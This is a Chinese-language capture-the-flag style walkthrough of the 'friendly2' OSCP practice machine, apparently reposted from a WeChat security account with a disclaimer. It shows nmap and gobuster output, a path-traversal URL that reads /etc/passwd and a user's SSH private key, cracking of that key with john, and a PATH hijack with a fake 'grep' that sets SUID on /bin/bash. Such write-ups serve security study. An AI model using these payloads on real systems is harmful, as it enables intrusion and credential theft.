OSCP 靶场
靶场介绍
|
friendly2 |
easy |
lfi利用、id_rsa 私钥爆破、sudo提权—$path劫持 |
信息收集
主机发现
nmap -sn 192.168.1.0/24
端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -p- -T4 192.168.1.59
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-28 02:24 EST
Nmap scan report for 192.168.1.59
Host is up (0.00038s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open http Apache httpd 2.4.56 ((Debian))
MAC Address: 08:00:27:0C:8F:A4 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.90 seconds
目录扫描
┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.59 -x html,txt,php -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.59
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.59/.html (Status: 403) [Size: 277]
http://192.168.1.59/.php (Status: 403) [Size: 277]
http://192.168.1.59/tools (Status: 301) [Size: 312] [--> http://192.168.1.59/tools/]
http://192.168.1.59/index.html (Status: 200) [Size: 2698]
http://192.168.1.59/assets (Status: 301) [Size: 313] [--> http://192.168.1.59/assets/]
http://192.168.1.59/.php (Status: 403) [Size: 277]
http://192.168.1.59/.html (Status: 403) [Size: 277]
http://192.168.1.59/server-status (Status: 403) [Size: 277]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
权限获取
tools 目录下发现提示信息,拼接目录可以访问到同目录下的html 页面。
通过测试发现存在lfi 漏洞
http://192.168.1.59/tools/check_if_exist.php?doc=../../../../../etc/passwd
通过测试发下gh0st用户id_rsa私钥
http://192.168.1.59/tools/check_if_exist.php?doc=../../../../../home/gh0st/.ssh/id_rsa
使用id_rsa ,但是需要爆破id_rsa 私钥
┌──(root㉿kali)-[~]
└─# john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
celtic (id_rsa)
1g 0:00:00:10 DONE (2024-02-28 03:41) 0.09124g/s 23.35p/s 23.35c/s 23.35C/s tiffany..freedom
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
权限提升
gh0st@friendly2:~$ cat /opt/security.sh
#!/bin/bash
echo "Enter the string to encode:"
read string
# Validate that the string is no longer than 20 characters
if [[ ${#string} -gt 20 ]]; then
echo "The string cannot be longer than 20 characters."
exit 1
fi
# Validate that the string does not contain special characters
if echo "$string" | grep -q '[^[:alnum:] ]'; then
echo "The string cannot contain special characters."
exit 1
fi
sus1='A-Za-z'
sus2='N-ZA-Mn-za-m'
encoded_string=$(echo "$string" | tr $sus1 $sus2)
echo "Original string: $string"
echo "Encoded string: $encoded_string"我们可以看到脚本里面使用了grep 命令,尝试劫持path路径,执行我们的特定脚本
gh0st@friendly2:/tmp$ nano grep
gh0st@friendly2:/tmp$ cat grep
#!/bin/bash
chmod +s /bin/bash
gh0st@friendly2:/tmp$ chmod +x grep篡改PATH 路径,然后执行我们指定的脚本
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】friendly2
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论